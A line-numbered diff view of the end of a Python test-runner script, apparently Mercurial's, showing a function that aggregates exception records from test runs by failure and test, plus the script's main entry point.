3674 vlog("# Found prerequisite", p, "at", _strpath(found))
3672 vlog("# Found prerequisite", p, "at", _strpath(found))
3675 else:
3673 else:
3676 print("WARNING: Did not find prerequisite tool: %s " % p)
3674 print("WARNING: Did not find prerequisite tool: %s " % p)
3677
3675
3678
3676
3679 def aggregateexceptions(path):
3677 def aggregateexceptions(path):
3680 exceptioncounts = collections.Counter()
3678 exceptioncounts = collections.Counter()
3681 testsbyfailure = collections.defaultdict(set)
3679 testsbyfailure = collections.defaultdict(set)
3682 failuresbytest = collections.defaultdict(set)
3680 failuresbytest = collections.defaultdict(set)
3683
3681
3684 for f in os.listdir(path):
3682 for f in os.listdir(path):
3685 with open(os.path.join(path, f), 'rb') as fh:
3683 with open(os.path.join(path, f), 'rb') as fh:
3686 data = fh.read().split(b'\0')
3684 data = fh.read().split(b'\0')
3687 if len(data) != 5:
3685 if len(data) != 5:
3688 continue
3686 continue
3689
3687
3690 exc, mainframe, hgframe, hgline, testname = data
3688 exc, mainframe, hgframe, hgline, testname = data
3691 exc = exc.decode('utf-8')
3689 exc = exc.decode('utf-8')
3692 mainframe = mainframe.decode('utf-8')
3690 mainframe = mainframe.decode('utf-8')
3693 hgframe = hgframe.decode('utf-8')
3691 hgframe = hgframe.decode('utf-8')
3694 hgline = hgline.decode('utf-8')
3692 hgline = hgline.decode('utf-8')
3695 testname = testname.decode('utf-8')
3693 testname = testname.decode('utf-8')
3696
3694
3697 key = (hgframe, hgline, exc)
3695 key = (hgframe, hgline, exc)
3698 exceptioncounts[key] += 1
3696 exceptioncounts[key] += 1
3699 testsbyfailure[key].add(testname)
3697 testsbyfailure[key].add(testname)
3700 failuresbytest[testname].add(key)
3698 failuresbytest[testname].add(key)
3701
3699
3702 # Find test having fewest failures for each failure.
3700 # Find test having fewest failures for each failure.
3703 leastfailing = {}
3701 leastfailing = {}
3704 for key, tests in testsbyfailure.items():
3702 for key, tests in testsbyfailure.items():
3705 fewesttest = None
3703 fewesttest = None
3706 fewestcount = 99999999
3704 fewestcount = 99999999
3707 for test in sorted(tests):
3705 for test in sorted(tests):
3708 if len(failuresbytest[test]) < fewestcount:
3706 if len(failuresbytest[test]) < fewestcount:
3709 fewesttest = test
3707 fewesttest = test
3710 fewestcount = len(failuresbytest[test])
3708 fewestcount = len(failuresbytest[test])
3711
3709
3712 leastfailing[key] = (fewestcount, fewesttest)
3710 leastfailing[key] = (fewestcount, fewesttest)
3713
3711
3714 # Create a combined counter so we can sort by total occurrences and
3712 # Create a combined counter so we can sort by total occurrences and
3715 # impacted tests.
3713 # impacted tests.
3716 combined = {}
3714 combined = {}
3717 for key in exceptioncounts:
3715 for key in exceptioncounts:
3718 combined[key] = (
3716 combined[key] = (
3719 exceptioncounts[key],
3717 exceptioncounts[key],
3720 len(testsbyfailure[key]),
3718 len(testsbyfailure[key]),
3721 leastfailing[key][0],
3719 leastfailing[key][0],
3722 leastfailing[key][1],
3720 leastfailing[key][1],
3723 )
3721 )
3724
3722
3725 return {
3723 return {
3726 'exceptioncounts': exceptioncounts,
3724 'exceptioncounts': exceptioncounts,
3727 'total': sum(exceptioncounts.values()),
3725 'total': sum(exceptioncounts.values()),
3728 'combined': combined,
3726 'combined': combined,
3729 'leastfailing': leastfailing,
3727 'leastfailing': leastfailing,
3730 'byfailure': testsbyfailure,
3728 'byfailure': testsbyfailure,
3731 'bytest': failuresbytest,
3729 'bytest': failuresbytest,
3732 }
3730 }
3733
3731
3734
3732
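# Editorial usage sketch for aggregateexceptions() above: rank failures by occurrence
# count and by the number of impacted tests, unpacking the 'combined' tuples built in
# the function. The helper name and report format are illustrative.
def _printworstfailures(exceptionsdir, limit=5):
    agg = aggregateexceptions(exceptionsdir)
    ranked = sorted(agg['combined'].items(), key=lambda kv: kv[1], reverse=True)
    for (frame, line, exc), (count, ntests, _fewest, test) in ranked[:limit]:
        print('%d occurrences in %d tests (e.g. %s): %s' % (count, ntests, test, exc))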
3735 if __name__ == '__main__':
3733 if __name__ == '__main__':
3736 runner = TestRunner()
3734 runner = TestRunner()
3737
3735
3738 try:
3736 try:
3739 import msvcrt
3737 import msvcrt
3740
3738
3741 msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
3739 msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
3742 msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
3740 msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
3743 msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
3741 msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
3744 except ImportError:
3742 except ImportError:
3745 pass
3743 pass
3746
3744
3747 sys.exit(runner.run(sys.argv[1:]))
3745 sys.exit(runner.run(sys.argv[1:]))